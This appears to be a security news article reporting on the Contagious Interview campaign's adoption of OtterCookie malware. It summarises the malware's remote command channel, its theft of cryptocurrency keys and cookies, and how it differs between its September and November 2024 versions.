Palo Alto Networks unveiled the Contagious Interview campaign in November 2023, shedding light on a financially motivated attack that differs from the usual nation-sponsored incursions. This campaign, known for leveraging BeaverTail and InvisibleFerret malware, has now incorporated OtterCookie according to recent observations by Security Operations Centers (SOCs). The emergence of OtterCookie reflects a new phase in the campaign’s evolution, underscoring the need for organizations to maintain vigilant monitoring and up-to-date threat intelligence to effectively counter the risks posed by Contagious Interview.
Unlike traditional attacks that are linked to specific nations, Contagious Interview attacks exploit vulnerabilities in software development processes and have diversified their sources. While Node.js projects and npm packages have been common entry points for attackers, there is now a shift towards targeting applications built with Qt and Electron frameworks. This shift showcases the active exploration by threat actors to identify and exploit fresh vulnerabilities in the software supply chain.
Previous research has outlined patterns where loaders download JavaScript code directly and execute it upon triggering a 500 HTTP status code, leading to the delivery of BeaverTail malware. However, recent instances have shown that OtterCookie infections have been detected alongside BeaverTail, indicating a shift in attack strategies.
The OtterCookie malware, observed in November 2024, utilizes Socket.IO for remote communication, enabling the execution of shell commands and the exfiltration of device information upon receiving commands via the socketServer function. Analysis of these commands revealed OtterCookie’s ability to collect cryptocurrency wallet keys from various files and transmit them to a remote server for further reconnaissance using commands like ls and cat.
A comparison between the November and September versions of OtterCookie demonstrates significant advancements in the former, particularly in the realm of stealing cryptocurrency keys. While both versions are capable of this task, the November version leverages remote shell commands, a departure from the regular expression-based checks used in September. Furthermore, the November iteration introduces clipboard monitoring functionality through the clipboardy library to extract sensitive data from the victim’s device – a feature absent in the September variant.
According to insights from NTT, the Contagious Interview threat actor group has unleashed a new strain of malware called OtterCookie, designed to target and extract browser cookies, potentially compromising user accounts. The attack vector is currently under investigation, but researchers have noted occurrences in Japan, signifying a geographical expansion of the campaign’s reach.
In conclusion, the inclusion of OtterCookie in the Contagious Interview campaign underscores the dynamic nature of cyber threats and the ever-evolving tactics employed by threat actors. Organizations must remain proactive in their cybersecurity measures, continuously updating their defenses to mitigate the risks posed by such sophisticated attacks.